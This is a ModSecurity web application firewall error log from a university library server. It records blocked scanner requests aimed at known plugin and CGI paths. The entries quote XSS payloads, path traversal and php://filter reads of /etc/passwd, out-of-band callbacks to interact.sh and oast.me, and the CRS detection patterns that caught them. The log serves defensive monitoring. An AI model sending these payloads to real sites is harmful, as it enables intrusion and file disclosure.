[Tue Aug 29 11:53:01.557499 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAnTlY4AAAAA"]
[Tue Aug 29 11:53:01.575002 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAoesKAAAAAV"]
[Tue Aug 29 11:53:02.682041 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAoqbOYAAAAj"]
[Tue Aug 29 11:53:02.818952 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAor7oQAAAAk"]
[Tue Aug 29 11:53:04.031295 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAn402cAAAAW"]
[Tue Aug 29 11:53:04.780571 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAonhoYAAAAg"]
[Tue Aug 29 11:53:04.908533 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAoLfPsAAAAG"]
[Tue Aug 29 11:53:06.049273 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAouCyQAAAAo"]
[Tue Aug 29 11:53:08.256733 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAor7o0AAAAk"]
[Tue Aug 29 11:53:08.360621 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAofm4wAAAAX"]
[Tue Aug 29 11:53:08.604538 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoocwIAAAAh"]
[Tue Aug 29 11:53:08.776702 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAot8MMAAAAn"]
[Tue Aug 29 11:53:09.665587 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tcCo-f0AAAnTlZ0AAAAA"]
[Tue Aug 29 11:53:10.823032 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAoZ6TIAAAAK"]
[Tue Aug 29 11:53:11.840781 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAouCy4AAAAo"]
[Tue Aug 29 11:53:11.999146 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoXJusAAAAP"]
[Tue Aug 29 11:53:12.207522 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAot8MsAAAAn"]
[Tue Aug 29 11:53:12.712449 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAoqbPsAAAAj"]
[Tue Aug 29 11:53:14.467429 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAolKUYAAAAe"]
[Tue Aug 29 11:53:14.601698 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAot8NMAAAAn"]
[Tue Aug 29 11:53:15.873136 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAot8NkAAAAn"]
[Tue Aug 29 11:53:16.553218 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAofm58AAAAX"]
[Tue Aug 29 11:53:17.789240 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAfWOV8AAAAL"]
[Tue Aug 29 11:53:18.924085 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAofm6UAAAAX"]
[Tue Aug 29 11:53:19.780712 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAojaqEAAAAb"]
[Tue Aug 29 11:53:19.853101 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAoXJvwAAAAP"]
[Tue Aug 29 11:53:19.936560 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAosCwkAAAAm"]
